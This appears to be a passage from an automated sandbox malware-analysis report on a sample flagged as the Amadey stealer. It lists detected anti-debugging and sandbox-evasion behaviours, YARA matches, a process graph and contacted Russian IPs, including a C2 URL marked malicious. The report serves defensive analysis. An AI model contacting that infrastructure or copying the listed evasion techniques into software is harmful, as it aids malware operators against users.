Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Code function: 4_2_04B10576 rdtsc 4_2_04B10576
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_0019643B mov eax, dword ptr fs:[00000030h] 11_2_0019643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_0019A1A2 mov eax, dword ptr fs:[00000030h] 11_2_0019A1A2
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: explorti.exe, explorti.exe, 00000017.00000002.3542780776.0000000000361000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: mProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_0017D2E8 cpuid 11_2_0017D2E8
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\ca57f95ede.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_0017CAED GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 11_2_0017CAED
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00166590 LookupAccountNameA, 11_2_00166590

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 11.2.explorti.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.explorti.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.explorti.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.explorti.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.explorti.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.8vZMEr8sm9.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.explorti.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000003.3501654035.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2344434490.0000000000161000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.2903364626.0000000004950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1329911234.0000000004970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2303837950.0000000004950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1700827096.0000000004880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1333744316.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2943676002.0000000000161000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1292523805.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1332559515.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1373634602.0000000000161000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3734657366.0000000000161000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1740999849.0000000000161000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3542337518.0000000000161000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1464827 Sample: 8vZMEr8sm9.exe Startdate: 30/06/2024 Architecture: WINDOWS Score: 100 31 Snort IDS alert for network traffic 2->31 33 Found malware configuration 2->33 35 Antivirus detection for URL or domain 2->35 37 11 other signatures 2->37 6 8vZMEr8sm9.exe 5 2->6         started        10 explorti.exe 2->10         started        12 explorti.exe 2->12         started        14 3 other processes 2->14 process3 file4 23 C:\Users\user\AppData\Local\...\explorti.exe, PE32 6->23 dropped 25 C:\Users\...\explorti.exe:Zone.Identifier, ASCII 6->25 dropped 47 Detected unpacking (changes PE section rights) 6->47 49 Tries to evade debugger and weak emulator (self modifying code) 6->49 51 Tries to detect virtualization through RDTSC time measurements 6->51 16 explorti.exe 15 6->16         started        53 Hides threads from debuggers 10->53 55 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->55 57 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->57 signatures5 process6 dnsIp7 27 77.91.77.82, 49703, 49704, 49705 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 16->27 29 77.91.77.81, 57431, 57432, 57433 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 16->29 21 C:\Users\user\AppData\Local\...\random[1].exe, PE32 16->21 dropped 39 Antivirus detection for dropped file 16->39 41 Multi AV Scanner detection for dropped file 16->41 43 Detected unpacking (changes PE section rights) 16->43 45 7 other signatures 16->45 file8 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
77.91.77.81
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU false
77.91.77.82
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://77.91.77.82/Hun4Ko/index.php true
  • Avira URL Cloud: phishing
 unknown